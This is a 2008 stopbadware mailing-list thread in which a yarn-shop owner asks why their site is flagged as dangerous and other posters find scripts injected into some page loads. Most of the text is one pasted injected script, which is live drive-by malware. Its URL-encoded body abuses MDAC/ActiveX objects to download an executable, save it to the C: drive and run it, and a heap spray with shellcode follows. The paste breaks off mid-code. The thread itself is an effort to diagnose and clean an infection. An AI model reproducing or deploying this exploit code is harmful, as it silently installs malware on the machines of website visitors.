What is wrong with GardenPartyFibers.com

5 views
Skip to first unread message

Flattery

unread,
Jan 13, 2008, 5:27:55 PM1/13/08
to stopbadware
I have tested the few out links this site has and non of them are in
the bad sites database.

Originally I put up a web ring on this site and then the next day
Google marked it bad. I can understand that so I removed it and
requested a review and then the review cam back saying that the site
was still dangerous.

I have searched through the code and find nothing. The site does not
distribute software and has very little javascript on the page. No
flash...

I have requested a review from stopbadware as well and I am waiting on
that, but will their review give me any more information than Googles
review? If they really want to eliminate badware it would work better
if we knew what they were calling badware on the site so we could help
and remove the badware as well.

If you want to heal a patient with cancer you don't just say you have
cancer and then not tell him where the cancer is... You tell him
where the cancer is so that it can be removed. At the very least,
Google could offer a paid service to get rid of the badware and make a
fortune.

The site is http://GardenPartyFibers.com and it sells yarn.

Oliver Fisher

unread,
Jan 13, 2008, 5:40:24 PM1/13/08
to stopbadware
What urls did Google say where bad after the review?

Oliver Fisher

unread,
Jan 13, 2008, 5:58:01 PM1/13/08
to stopbadware
This looks fun - in a horribly painful sort of way...

I just did 4 requests to the first url (ANGOVDBE78). The 1st and 3rd
contained script tags just after the <BODY> tag:

<script language='JavaScript' type='text/javascript' src='ysxgj.js'></
script>

and

<script language='JavaScript' type='text/javascript' src='eizru.js'></
script>

The two js files are almost identical and contain a large chunk of
escaped script.

The 2nd and 4th requests I made to ANGOVDBE78 did NOT contain the
<script> tag. It looks like you've got something and it's trying to
hide.

O.

On Jan 13, 5:43 pm, Flattery <rob...@hickorytech.net> wrote:
> It seems to be across the board but here is a list:
>
> #http://gardenpartyfibers.com/view_product.php?product=ANGOVDBE78
> #http://gardenpartyfibers.com/tellafriend.php?product=50-GIFTCERT&sess...
> #http://gardenpartyfibers.com/gallery.php?ImageId=37
> #http://gardenpartyfibers.com/view_product.php?product=GOLKNKRL14
> #http://gardenpartyfibers.com/tellafriend.php?product=SUPBE1MR199&sess...
> #http://gardenpartyfibers.com/tellafriend.php?product=GOLKNKRL14&sessi...
> #http://gardenpartyfibers.com/view_product.php?product=GAR54I6V205
> #http://gardenpartyfibers.com/gallery.php?ImageId=37
> #http://gardenpartyfibers.com/tellafriend.php?product=50-GIFTCERT&sess...
> #http://gardenpartyfibers.com/tellafriend.php?product=SUPBE1MR199&sess...
> #http://gardenpartyfibers.com/view_product.php?product=ANGOVDBE78
> #http://gardenpartyfibers.com/view_product.php?product=GOLKNKRL14

Flattery

unread,
Jan 13, 2008, 6:03:15 PM1/13/08
to stopbadware
That is odd. It does not show up on my computer when I view source...
but thank you it gives me some direction.

Not sure why this shows up for you and not for me...

Murdoch

unread,
Jan 13, 2008, 9:37:19 PM1/13/08
to stopbadware
My server too has been infected by this exploit. We should compare
software version lists. If there is a common piece of software, that
means it is the likely culprit.

The server is running cPanel 11.16.0-R18546 with PHP 4.4.7, MySQL
4.1.22, Apache 2.0.61, and Perl 5.8.8.

Chris Wright

unread,
Jan 13, 2008, 9:58:09 PM1/13/08
to stopb...@googlegroups.com
Oliver Fisher wrote:
> This looks fun - in a horribly painful sort of way...
>
>
<script src="quryb.js" type="text/javascript" language="JavaScript">
1var arg="ajqbitue";
2
3var MU = "http://" + document.location.hostname + "/" + arg;
4var MH = '';
5var MUT = MU;
6for (i=0; i < MUT.length; i++)
7{
8 var b = MUT.charCodeAt (i);
9 MH = MH + b.toString (16);
10}
11MH = MH.toUpperCase();
12if (Math.round(MUT.length/2) != (MUT.length/2))
13{
14 MH += '00';
15}
16
17var MR = '';
18for (i=0; i < MH.length; i += 4)
19{
20 MR = MR + '%u' + MH.substring(i+2, i+4) + MH.substring(i, i+2);
21}
22
23var MU2 = "\"" + MU + "\"";
24var MR2 = "\"" + MR + "\"";
25
26var SB =
27unescape
('%3c%68%74%6d%6c%3e%0a%3c%62%6f%64%79%3e%0a%3c%73%63%72%69%70%74%20%6c%61%6e%67%75%61%67%65%3d%22%4a%61%76%61%53%63%72%69%70%74%22%3e%0a%0a%66%75%6e%63%74%69%6f%6e%20%47%65%74%52%61%6e%64%53%74%72%69%6e%67%28%6c%65%6e%29%0a%7b%0a%09%76%61%72%20%63%68%61%72%73%20%3d%20%22%61%62%63%64%65%66%67%68%69%6b%6c%6d%6e%6f%70%71%72%73%74%75%76%77%78%79%7a%22%3b%0a%09%76%61%72%20%73%74%72%69%6e%67%5f%6c%65%6e%67%74%68%20%3d%20%6c%65%6e%3b%0a%09%76%61%72%20%72%61%6e%64%6f%6d%73%74%72%69%6e%67%20%3d%20%27%27%3b%0a%09%66%6f%72%20%28%76%61%72%20%69%3d%30%3b%20%69%3c%73%74%72%69%6e%67%5f%6c%65%6e%67%74%68%3b%20%69%2b%2b%29%20%7b%0a%09%09%76%61%72%20%72%6e%75%6d%20%3d%20%4d%61%74%68%2e%66%6c%6f%6f%72%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%20%2a%20%63%68%61%72%73%2e%6c%65%6e%67%74%68%29%3b%0a%09%09%72%61%6e%64%6f%6d%73%74%72%69%6e%67%20%2b%3d%20%63%68%61%72%73%2e%73%75%62%73%74%72%69%6e%67%28%72%6e%75%6d%2c%72%6e%75%6d%2b%31%29%3b%0a%09%7d%0a%0a%09%72%65%74%75%72%6e%20%72%61%6e%64%6f%6d%73%74%72%69%6e%67%3b%0a%7d%0a%0a%66%75%6e%63%74%69%6f%6e%20%43%72%65%61%74%65%4f%62%6a%65%63%74%28%43%4c%53%49%44%2c%20%6e%61%6d%65%29%20%7b%0a%09%76%61%72%20%72%20%3d%20%6e%75%6c%6c%3b%0a%09%74%72%79%20%7b%20%65%76%61%6c%28%27%72%20%3d%20%43%4c%53%49%44%2e%43%72%65%61%74%65%4f%62%6a%65%63%74%28%6e%61%6d%65%29%27%29%20%7d%63%61%74%63%68%28%65%29%7b%7d%09%0a%09%69%66%20%28%21%20%72%29%20%7b%20%74%72%79%20%7b%20%65%76%61%6c%28%27%72%20%3d%20%43%4c%53%49%44%2e%43%72%65%61%74%65%4f%62%6a%65%63%74%28%6e%61%6d%65%2c%20%22%22%29%27%29%20%7d%63%61%74%63%68%28%65%29%7b%7d%20%7d%0a%09%69%66%20%28%21%20%72%29%20%7b%20%74%72%79%20%7b%20%65%76%61%6c%28%27%72%20%3d%20%43%4c%53%49%44%2e%43%72%65%61%74%65%4f%62%6a%65%63%74%28%6e%61%6d%65%2c%20%22%22%2c%20%22%22%29%27%29%20%7d%63%61%74%63%68%28%65%29%7b%7d%20%7d%0a%09%69%66%20%28%21%20%72%29%20%7b%20%74%72%79%20%7b%20%65%76%61%6c%28%27%72%20%3d%20%43%4c%53%49%44%2e%47%65%74%4f%62%6a%65%63%74%28%22%22%2c%20%6e%61%6d%65%29%27%29%20%7d%63%61%74%63%68%28%65%29%7b%7d%20%7d%0a%09%69%66%20%28%21%20%72%29%20%7b%20%74%72%79%20%7b%20%65%76%61%6c%28%27%72%20%3d%20%43%4c%53%49%44%2e%47%65%74%4f%62%6a%65%63%74%28%6e%61%6d%65%2c%20%22%22%29%27%29%20%7d%63%61%74%63%68%28%65%29%7b%7d%20%7d%0a%09%69%66%20%28%21%20%72%29%20%7b%20%74%72%79%20%7b%20%65%76%61%6c%28%27%72%20%3d%20%43%4c%53%49%44%2e%47%65%74%4f%62%6a%65%63%74%28%6e%61%6d%65%29%27%29%20%7d%63%61%74%63%68%28%65%29%7b%7d%20%7d%0a%09%72%65%74%75%72%6e%28%72%29%3b%0a%7d%0a%0a%66%75%6e%63%74%69%6f%6e%20%58%4d%4c%48%74%74%70%44%6f%77%6e%6c%6f%61%64%28%78%6d%6c%2c%20%75%72%6c%29%20%7b%0a%0a%09%74%72%79%20%7b%0a%09%09%78%6d%6c%2e%6f%70%65%6e%28%22%47%45%54%22%2c%20%75%72%6c%2c%20%66%61%6c%73%65%29%3b%0a%09%09%78%6d%6c%2e%73%65%6e%64%28%6e%75%6c%6c%29%3b%0a%0a%09%7d%20%63%61%74%63%68%28%65%29%20%7b%20%72%65%74%75%72%6e%20%30%3b%20%7d%0a%0a%09%72%65%74%75%72%6e%20%78%6d%6c%2e%72%65%73%70%6f%6e%73%65%42%6f%64%79%3b%0a%7d%0a%0a%66%75%6e%63%74%69%6f%6e%20%41%44%4f%42%44%53%74%72%65%61%6d%53%61%76%65%28%6f%2c%20%6e%61%6d%65%2c%20%64%61%74%61%29%20%7b%0a%0a%09%74%72%79%20%7b%0a%09%09%6f%2e%54%79%70%65%20%3d%20%31%3b%0a%09%09%6f%2e%4d%6f%64%65%20%3d%20%33%3b%0a%09%09%6f%2e%4f%70%65%6e%28%29%3b%0a%09%09%6f%2e%57%72%69%74%65%28%64%61%74%61%29%3b%0a%09%09%6f%2e%53%61%76%65%54%6f%46%69%6c%65%28%6e%61%6d%65%2c%20%32%29%3b%0a%09%09%6f%2e%43%6c%6f%73%65%28%29%3b%0a%09%7d%20%63%61%74%63%68%28%65%29%20%7b%20%72%65%74%75%72%6e%20%30%3b%20%7d%0a%0a%09%72%65%74%75%72%6e%20%31%3b%0a%7d%0a%0a%66%75%6e%63%74%69%6f%6e%20%73%74%61%72%74%4d%44%41%43%28%29%20%7b%0a%09%76%61%72%20%74%20%3d%20%6e%65%77%20%41%72%72%61%79%28%27%7b%42%44%39%36%43%35%35%36%2d%36%35%41%33%2d%31%31%44%30%2d%39%38%33%41%2d%30%30%43%30%34%46%43%32%39%45%33%30%7d%27%2c%20%27%7b%42%44%39%36%43%35%35%36%2d%36%35%41%33%2d%31%31%44%30%2d%39%38%33%41%2d%30%30%43%30%34%46%43%32%39%45%33%36%7d%27%2c%20%27%7b%41%42%39%42%43%45%44%44%2d%45%43%37%45%2d%34%37%45%31%2d%39%33%32%32%2d%44%34%41%32%31%30%36%31%37%31%31%36%7d%27%2c%20%27%7b%30%30%30%36%46%30%33%33%2d%30%30%30%30%2d%30%30%30%30%2d%43%30%30%30%2d%30%30%30%30%30%30%30%30%30%30%34%36%7d%27%2c%20%27%7b%30%30%30%36%46%30%33%41%2d%30%30%30%30%2d%30%30%30%30%2d%43%30%30%30%2d%30%30%30%30%30%30%30%30%30%30%34%36%7d%27%2c%20%27%7b%36%65%33%32%30%37%30%61%2d%37%36%36%64%2d%34%65%65%36%2d%38%37%39%63%2d%64%63%31%66%61%39%31%64%32%66%63%33%7d%27%2c%20%27%7b%36%34%31%34%35%31%32%42%2d%42%39%37%38%2d%34%35%31%44%2d%41%30%44%38%2d%46%43%46%44%46%33%33%45%38%33%33%43%7d%27%2c%20%27%7b%37%46%35%42%37%46%36%33%2d%46%30%36%46%2d%34%33%33%31%2d%38%41%32%36%2d%33%33%39%45%30%33%43%30%41%45%33%44%7d%27%2c%20%27%7b%30%36%37%32%33%45%30%39%2d%46%34%43%32%2d%34%33%63%38%2d%38%33%35%38%2d%30%39%46%43%44%31%44%42%30%37%36%36%7d%27%2c%20%27%7b%36%33%39%46%37%32%35%46%2d%31%42%32%44%2d%34%38%33%31%2d%41%39%46%44%2d%38%37%34%38%34%37%36%38%32%30%31%30%7d%27%2c%20%27%7b%42%41%30%31%38%35%39%39%2d%31%44%42%33%2d%34%34%66%39%2d%38%33%42%34%2d%34%36%31%34%35%34%43%38%34%42%46%38%7d%27%2c%20%27%7b%44%30%43%30%37%44%35%36%2d%37%43%36%39%2d%34%33%46%31%2d%42%34%41%30%2d%32%35%46%35%41%31%31%46%41%42%31%39%7d%27%2c%20%27%7b%45%38%43%43%43%44%44%46%2d%43%41%32%38%2d%34%39%36%62%2d%42%30%35%30%2d%36%43%30%37%43%39%36%32%34%37%36%42%7d%27%2c%20%6e%75%6c%6c%29%3b%0a%09%76%61%72%20%76%20%3d%20%6e%65%77%20%41%72%72%61%79%28%6e%75%6c%6c%2c%20%6e%75%6c%6c%2c%20%6e%75%6c%6c%29%3b%0a%09%76%61%72%20%69%20%3d%20%30%3b%0a%09%76%61%72%20%6e%20%3d%20%30%3b%0a%09%76%61%72%20%72%65%74%20%3d%20%30%3b%0a%09%76%61%72%20%75%72%6c%52%65%61%6c%45%78%65%20%3d%20%20%20%20%20%20')
+
28MU2 +
29unescape
('%3b%0a%0a%09%77%68%69%6c%65%20%28%74%5b%69%5d%20%26%26%20%28%21%20%76%5b%30%5d%20%7c%7c%20%21%20%76%5b%31%5d%20%7c%7c%20%21%20%76%5b%32%5d%29%20%29%20%7b%0a%09%09%76%61%72%20%61%20%3d%20%6e%75%6c%6c%3b%0a%0a%09%09%74%72%79%20%7b%0a%09%09%09%61%20%3d%20%64%6f%63%75%6d%65%6e%74%2e%63%72%65%61%74%65%45%6c%65%6d%65%6e%74%28%22%6f%62%6a%65%63%74%22%29%3b%0a%09%09%09%61%2e%73%65%74%41%74%74%72%69%62%75%74%65%28%22%63%6c%61%73%73%69%64%22%2c%20%22%63%6c%73%69%64%3a%22%20%2b%20%74%5b%69%5d%2e%73%75%62%73%74%72%69%6e%67%28%31%2c%20%74%5b%69%5d%2e%6c%65%6e%67%74%68%20%2d%20%31%29%29%3b%0a%09%09%7d%20%63%61%74%63%68%28%65%29%20%7b%20%61%20%3d%20%6e%75%6c%6c%3b%20%7d%0a%0a%09%09%69%66%20%28%61%29%20%7b%0a%09%09%09%69%66%20%28%21%20%76%5b%30%5d%29%20%7b%0a%09%09%09%09%76%5b%30%5d%20%3d%20%43%72%65%61%74%65%4f%62%6a%65%63%74%28%61%2c%20%22%6d%73%78%6d%6c%32%2e%58%4d%4c%48%54%54%50%22%29%3b%0a%09%09%09%09%69%66%20%28%21%20%76%5b%30%5d%29%20%76%5b%30%5d%20%3d%20%43%72%65%61%74%65%4f%62%6a%65%63%74%28%61%2c%20%22%4d%69%63%72%6f%73%6f%66%74%2e%58%4d%4c%48%54%54%50%22%29%3b%0a%09%09%09%09%69%66%20%28%21%20%76%5b%30%5d%29%20%76%5b%30%5d%20%3d%20%43%72%65%61%74%65%4f%62%6a%65%63%74%28%61%2c%20%22%4d%53%58%4d%4c%32%2e%53%65%72%76%65%72%58%4d%4c%48%54%54%50%22%29%3b%0a%09%09%09%7d%0a%0a%09%09%09%69%66%20%28%21%20%76%5b%31%5d%29%20%7b%0a%09%09%09%09%76%5b%31%5d%20%3d%20%43%72%65%61%74%65%4f%62%6a%65%63%74%28%61%2c%20%22%41%44%4f%44%42%2e%53%74%72%65%61%6d%22%29%3b%0a%09%09%09%7d%0a%0a%09%09%09%69%66%20%28%21%20%76%5b%32%5d%29%20%7b%0a%09%09%09%09%76%5b%32%5d%20%3d%20%43%72%65%61%74%65%4f%62%6a%65%63%74%28%61%2c%20%22%57%53%63%72%69%70%74%2e%53%68%65%6c%6c%22%29%3b%0a%09%09%09%09%6e%20%3d%20%30%3b%0a%09%09%09%09%69%66%20%28%21%20%76%5b%32%5d%29%20%7b%0a%09%09%09%09%09%76%5b%32%5d%20%3d%20%43%72%65%61%74%65%4f%62%6a%65%63%74%28%61%2c%20%22%53%68%65%6c%6c%2e%41%70%70%6c%69%63%61%74%69%6f%6e%22%29%3b%0a%09%09%09%09%09%69%66%20%28%76%5b%32%5d%29%20%7b%0a%09%09%09%09%09%09%6e%3d%31%3b%0a%09%09%09%09%09%7d%0a%09%09%09%09%7d%0a%09%09%09%7d%0a%09%09%7d%0a%0a%09%09%69%2b%2b%3b%0a%09%7d%0a%0a%09%69%66%20%28%76%5b%30%5d%20%26%26%20%76%5b%31%5d%20%26%26%20%76%5b%32%5d%29%20%7b%0a%09%09%76%61%72%20%64%61%74%61%20%3d%20%58%4d%4c%48%74%74%70%44%6f%77%6e%6c%6f%61%64%28%76%5b%30%5d%2c%20%75%72%6c%52%65%61%6c%45%78%65%29%3b%0a%09%09%69%66%20%28%64%61%74%61%20%21%3d%20%30%29%20%7b%0a%09%09%09%76%61%72%20%6e%61%6d%65%20%3d%20%22%63%3a%5c%5c%77%69%6e%22%2b%47%65%74%52%61%6e%64%53%74%72%69%6e%67%28%34%29%2b%22%2e%65%78%65%22%3b%0a%09%09%09%69%66%20%28%41%44%4f%42%44%53%74%72%65%61%6d%53%61%76%65%28%76%5b%31%5d%2c%20%6e%61%6d%65%2c%20%64%61%74%61%29%20%3d%3d%20%31%29%20%7b%0a%09%09%09%09%69%66%20%28%6e%20%3d%3d%20%30%29%20%7b%0a%09%09%09%09%09%74%72%79%20%7b%0a%09%09%09%09%09%09%76%5b%32%5d%2e%52%75%6e%28%6e%61%6d%65%2c%20%30%29%3b%0a%09%09%09%09%09%09%72%65%74%20%3d%20%31%3b%0a%09%09%09%09%09%7d%20%63%61%74%63%68%28%65%29%20%7b%20%7d%0a%09%09%09%09%7d%20%65%6c%73%65%20%7b%0a%0a%09%09%09%09%09%74%72%79%20%7b%0a%09%09%09%09%09%09%76%5b%32%5d%2e%53%68%65%6c%6c%45%78%65%63%75%74%65%28%6e%61%6d%65%2c%20%22%22%2c%20%22%22%2c%20%22%6f%70%65%6e%22%2c%20%30%29%3b%0a%09%09%09%09%09%09%72%65%74%20%3d%20%31%3b%0a%09%09%09%09%09%7d%20%63%61%74%63%68%28%65%29%20%7b%20%7d%0a%09%09%09%09%7d%0a%09%09%09%7d%0a%09%09%7d%0a%09%7d%0a%0a%09%72%65%74%75%72%6e%20%72%65%74%3b%0a%7d%0a%76%61%72%20%6d%65%6d%6f%72%79%20%3d%20%6e%65%77%20%41%72%72%61%79%28%29%3b%0a%76%61%72%20%6d%65%6d%5f%66%6c%61%67%20%3d%20%30%3b%0a%0a%66%75%6e%63%74%69%6f%6e%20%68%61%76%69%6e%67%28%29%0a%7b%0a%09%6d%65%6d%6f%72%79%3d%6d%65%6d%6f%72%79%3b%0a%09%73%65%74%54%69%6d%65%6f%75%74%28%22%68%61%76%69%6e%67%28%29%22%2c%20%32%30%30%30%29%3b%0a%7d%0a%0a%66%75%6e%63%74%69%6f%6e%20%67%65%74%53%70%72%61%79%53%6c%69%64%65%28%73%70%72%61%79%53%6c%69%64%65%2c%20%73%70%72%61%79%53%6c%69%64%65%53%69%7a%65%29%0a%7b%0a%09%77%68%69%6c%65%20%28%73%70%72%61%79%53%6c%69%64%65%2e%6c%65%6e%67%74%68%2a%32%3c%73%70%72%61%79%53%6c%69%64%65%53%69%7a%65%29%0a%09%7b%0a%09%09%73%70%72%61%79%53%6c%69%64%65%20%2b%3d%20%73%70%72%61%79%53%6c%69%64%65%3b%0a%09%7d%0a%0a%09%73%70%72%61%79%53%6c%69%64%65%20%3d%20%73%70%72%61%79%53%6c%69%64%65%2e%73%75%62%73%74%72%69%6e%67%28%30%2c%73%70%72%61%79%53%6c%69%64%65%53%69%7a%65%2f%32%29%3b%0a%09%72%65%74%75%72%6e%20%73%70%72%61%79%53%6c%69%64%65%3b%0a%7d%0a%0a%66%75%6e%63%74%69%6f%6e%20%73%65%74%53%70%49%64%28%69%64%29%0a%7b%0a%09%74%72%79%20%7b%0a%09%09%76%61%72%20%74%6f%64%61%79%44%61%74%65%20%3d%20%6e%65%77%20%44%61%74%65%28%29%3b%0a%09%09%74%6f%64%61%79%44%61%74%65%2e%73%65%74%44%61%74%65%28%74%6f%64%61%79%44%61%74%65%2e%67%65%74%44%61%74%65%28%29%20%2b%20%31%29%3b%0a%0a%09%09%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%20%3d%0a%09%09%09%22%69%64%3d%22%20%2b%20%69%64%20%2b%0a%09%09%09%22%3b%20%65%78%70%69%72%65%73%3d%22%20%2b%20%74%6f%64%61%79%44%61%74%65%2e%74%6f%47%4d%54%53%74%72%69%6e%67%28%29%20%2b%0a%09%09%09%22%3b%20%70%61%74%68%3d%2f%22%3b%0a%09%7d%20%63%61%74%63%68%28%65%29%20%7b%7d%0a%7d%0a%0a%66%75%6e%63%74%69%6f%6e%20%6d%61%6b%65%53%6c%69%64%65%28%29%0a%7b%0a%09%69%66%20%28%21%20%6d%65%6d%5f%66%6c%61%67%29%20%7b%0a%09%09%76%61%72%20%68%65%61%70%53%70%72%61%79%54%6f%41%64%64%72%65%73%73%20%3d%20%30%78%30%63%30%63%30%63%30%63%3b%0a%09%09%76%61%72%20%70%61%79%4c%6f%61%64%43%6f%64%65%20%3d%20%75%6e%65%73%63%61%70%65%28%22%25%75%34%33%34%33%25%75%34%33%34%33%25%75%30%66%65%62%25%75%33%33%35%62%25%75%36%36%63%39%25%75%38%30%62%39%25%75%38%30%30%31%25%75%65%66%33%33%22%20%2b%0a%22%25%75%65%32%34%33%25%75%65%62%66%61%25%75%65%38%30%35%25%75%66%66%65%63%25%75%66%66%66%66%25%75%38%62%37%66%25%75%64%66%34%65%25%75%65%66%65%66%25%75%36%34%65%66%25%75%65%33%61%66%25%75%39%66%36%34%25%75%34%32%66%33%25%75%39%66%36%34%25%75%36%65%65%37%25%75%65%66%30%33%25%75%65%66%65%62%22%20%2b%0a%22%25%75%36%34%65%66%25%75%62%39%30%33%25%75%36%31%38%37%25%75%65%31%61%31%25%75%30%37%30%33%25%75%65%66%31%31%25%75%65%66%65%66%25%75%61%61%36%36%25%75%62%39%65%62%25%75%37%37%38%37%25%75%36%35%31%31%25%75%30%37%65%31%25%75%65%66%31%66%25%75%65%66%65%66%25%75%61%61%36%36%25%75%62%39%65%37%22%20%2b%0a%22%25%75%63%61%38%37%25%75%31%30%35%66%25%75%30%37%32%64%25%75%65%66%30%64%25%75%65%66%65%66%25%75%61%61%36%36%25%75%62%39%65%33%25%75%30%30%38%37%25%75%30%66%32%31%25%75%30%37%38%66%25%75%65%66%33%62%25%75%65%66%65%66%25%75%61%61%36%36%25%75%62%39%66%66%25%75%32%65%38%37%25%75%30%61%39%36%22%20%2b%0a%22%25%75%30%37%35%37%25%75%65%66%32%39%25%75%65%66%65%66%25%75%61%61%36%36%25%75%61%66%66%62%25%75%64%37%36%66%25%75%39%61%32%63%25%75%36%36%31%35%25%75%66%37%61%61%25%75%65%38%30%36%25%75%65%66%65%65%25%75%62%31%65%66%25%75%39%61%36%36%25%75%36%34%63%62%25%75%65%62%61%61%25%75%65%65%38%35%22%20%2b%0a%22%25%75%36%34%62%36%25%75%66%37%62%61%25%75%30%37%62%39%25%75%65%66%36%34%25%75%65%66%65%66%25%75%38%37%62%66%25%75%66%35%64%39%25%75%39%66%63%30%25%75%37%38%30%37%25%75%65%66%65%66%25%75%36%36%65%66%25%75%66%33%61%61%25%75%32%61%36%34%25%75%32%66%36%63%25%75%36%36%62%66%25%75%63%66%61%61%22%20%2b%0a%22%25%75%31%30%38%37%25%75%65%66%65%66%25%75%62%66%65%66%25%75%61%61%36%34%25%75%38%35%66%62%25%75%62%36%65%64%25%75%62%61%36%34%25%75%30%37%66%37%25%75%65%66%38%65%25%75%65%66%65%66%25%75%61%61%65%63%25%75%32%38%63%66%25%75%62%33%65%66%25%75%63%31%39%31%25%75%32%38%38%61%25%75%65%62%61%66%22%20%2b%0a%22%25%75%38%61%39%37%25%75%65%66%65%66%25%75%39%61%31%30%25%75%36%34%63%66%25%75%65%33%61%61%25%75%65%65%38%35%25%75%36%34%62%36%25%75%66%37%62%61%25%75%61%66%30%37%25%75%65%66%65%66%25%75%38%35%65%66%25%75%62%37%65%38%25%75%61%61%65%63%25%75%64%63%63%62%25%75%62%63%33%34%25%75%31%30%62%63%22%20%2b%0a%22%25%75%63%66%39%61%25%75%62%63%62%66%25%75%61%61%36%34%25%75%38%35%66%33%25%75%62%36%65%61%25%75%62%61%36%34%25%75%30%37%66%37%25%75%65%66%63%63%25%75%65%66%65%66%25%75%65%66%38%35%25%75%39%61%31%30%25%75%36%34%63%66%25%75%65%37%61%61%25%75%65%64%38%35%25%75%36%34%62%36%25%75%66%37%62%61%22%20%2b%0a%22%25%75%66%66%30%37%25%75%65%66%65%66%25%75%38%35%65%66%25%75%36%34%31%30%25%75%66%66%61%61%25%75%65%65%38%35%25%75%36%34%62%36%25%75%66%37%62%61%25%75%65%66%30%37%25%75%65%66%65%66%25%75%61%65%65%66%25%75%62%64%62%34%25%75%30%65%65%63%25%75%30%65%65%63%25%75%30%65%65%63%25%75%30%65%65%63%22%20%2b%0a%22%25%75%30%33%36%63%25%75%62%35%65%62%25%75%36%34%62%63%25%75%30%64%33%35%25%75%62%64%31%38%25%75%30%66%31%30%25%75%36%34%62%61%25%75%36%34%30%33%25%75%65%37%39%32%25%75%62%32%36%34%25%75%62%39%65%33%25%75%39%63%36%34%25%75%36%34%64%33%25%75%66%31%39%62%25%75%65%63%39%37%25%75%62%39%31%63%22%20%2b%0a%22%25%75%39%39%36%34%25%75%65%63%63%66%25%75%64%63%31%63%25%75%61%36%32%36%25%75%34%32%61%65%25%75%32%63%65%63%25%75%64%63%62%39%25%75%65%30%31%39%25%75%66%66%35%31%25%75%31%64%64%35%25%75%65%37%39%62%25%75%32%31%32%65%25%75%65%63%65%32%25%75%61%66%31%64%25%75%31%65%30%34%25%75%31%31%64%34%22%20%2b%0a%22%25%75%39%61%62%31%25%75%62%35%30%61%25%75%30%34%36%34%25%75%62%35%36%34%25%75%65%63%63%62%25%75%38%39%33%32%25%75%65%33%36%34%25%75%36%34%61%34%25%75%66%33%62%35%25%75%33%32%65%63%25%75%65%62%36%34%25%75%65%63%36%34%25%75%62%31%32%61%25%75%32%64%62%32%25%75%65%66%65%37%25%75%31%62%30%37%22%20%2b%0a%22%25%75%31%30%31%31%25%75%62%61%31%30%25%75%61%33%62%64%25%75%61%30%61%32%25%75%65%66%61%31%22%20%2b%20')
+
30MR2 +
31unescape
('%29%3b%0d%0a%09%09%76%61%72%20%68%65%61%70%42%6c%6f%63%6b%53%69%7a%65%20%3d%20%30%78%34%30%30%30%30%30%3b%0d%0a%09%09%76%61%72%20%70%61%79%4c%6f%61%64%53%69%7a%65%20%3d%20%70%61%79%4c%6f%61%64%43%6f%64%65%2e%6c%65%6e%67%74%68%20%2a%20%32%3b%0d%0a%09%09%76%61%72%20%73%70%72%61%79%53%6c%69%64%65%53%69%7a%65%20%3d%20%68%65%61%70%42%6c%6f%63%6b%53%69%7a%65%20%2d%20%28%70%61%79%4c%6f%61%64%53%69%7a%65%2b%30%78%33%38%29%3b%0d%0a%09%09%76%61%72%20%73%70%72%61%79%53%6c%69%64%65%20%3d%20%75%6e%65%73%63%61%70%65%28%22%25%75%30%63%30%63%25%75%30%63%30%63%22%29%3b%0d%0a%0d%0a%09%09%73%70%72%61%79%53%6c%69%64%65%20%3d%20%67%65%74%53%70%72%61%79%53%6c%69%64%65%28%73%70%72%61%79%53%6c%69%64%65%2c%73%70%72%61%79%53%6c%69%64%65%53%69%7a%65%29%3b%0d%0a%09%09%68%65%61%70%42%6c%6f%63%6b%73%20%3d%20%28%68%65%61%70%53%70%72%61%79%54%6f%41%64%64%72%65%73%73%20%2d%20%30%78%34%30%30%30%30%30%29%2f%68%65%61%70%42%6c%6f%63%6b%53%69%7a%65%3b%0d%0a%09%0d%0a%09%09%66%6f%72%20%28%69%3d%30%3b%69%3c%68%65%61%70%42%6c%6f%63%6b%73%3b%69%2b%2b%29%20%7b%0d%0a%09%09%09%6d%65%6d%6f%72%79%5b%69%5d%20%3d%20%73%70%72%61%79%53%6c%69%64%65%20%2b%20%70%61%79%4c%6f%61%64%43%6f%64%65%3b%0d%0a%09%09%7d%0d%0a%0d%0a%09%09%6d%65%6d%5f%66%6c%61%67%20%3d%20%31%3b%0d%0a%09%09%68%61%76%69%6e%67%28%29%3b%0d%0a%09%7d%0d%0a%0d%0a%09%72%65%74%75%72%6e%20%30%3b%0d%0a%7d%0d%0a%76%61%72%20%70%61%64%64%69%6e%67%20%3d%20%22%41%41%41%41%22%3b%0d%0a%76%61%72%20%68%65%61%70%42%61%73%65%20%3d%20%30%78%30%30%31%35%30%30%30%30%3b%0d%0a%76%61%72%20%6d%65%6d%6f%3b%0d%0a%0d%0a%66%75%6e%63%74%69%6f%6e%20%69%6e%69%74%28%6d%61%78%41%6c%6c%6f%63%29%0d%0a%7b%0d%0a%09%77%68%69%6c%65%20%28%34%20%2b%20%70%61%64%64%69%6e%67%2e%6c%65%6e%67%74%68%2a%32%20%2b%20%32%20%3c%20%36%35%35%33%35%29%0d%0a%09%09%70%61%64%64%69%6e%67%20%2b%3d%20%70%61%64%64%69%6e%67%3b%0d%0a%0d%0a%09%6d%65%6d%6f%20%3d%20%6e%65%77%20%41%72%72%61%79%28%29%3b%0d%0a%09%66%6c%75%73%68%28%29%3b%0d%0a%7d%0d%0a%0d%0a%0d%0a%66%75%6e%63%74%69%6f%6e%20%66%6c%75%73%68%28%29%0d%0a%7b%0d%0a%09%64%65%6c%65%74%65%20%6d%65%6d%6f%5b%22%70%6c%75%6e%67%65%72%22%5d%3b%0d%0a%09%43%6f%6c%6c%65%63%74%47%61%72%62%61%67%65%28%29%3b%0d%0a%0d%0a%09%6d%65%6d%6f%5b%22%70%6c%75%6e%67%65%72%22%5d%20%3d%20%6e%65%77%20%41%72%72%61%79%28%29%3b%0d%0a%09%76%61%72%20%62%79%74%65%73%20%3d%20%6e%65%77%20%41%72%72%61%79%28%33%32%2c%20%36%34%2c%20%32%35%36%2c%20%33%32%37%36%38%29%3b%0d%0a%0d%0a%09%66%6f%72%20%28%76%61%72%20%69%20%3d%20%30%3b%20%69%20%3c%20%36%3b%20%69%2b%2b%29%20%7b%0d%0a%09%09%66%6f%72%28%76%61%72%20%6e%20%3d%20%30%3b%20%6e%20%3c%20%34%3b%20%6e%2b%2b%29%20%7b%0d%0a%09%09%09%76%61%72%20%6c%65%6e%20%3d%20%6d%65%6d%6f%5b%22%70%6c%75%6e%67%65%72%22%5d%2e%6c%65%6e%67%74%68%3b%0d%0a%09%09%09%65%76%61%6c%28%27%6d%65%6d%6f%5b%22%70%6c%75%6e%67%65%72%22%5d%5b%6c%65%6e%5d%20%3d%20%70%61%64%64%69%6e%67%2e%73%75%62%73%74%72%28%30%2c%20%28%27%20%2b%20%62%79%74%65%73%5b%6e%5d%20%2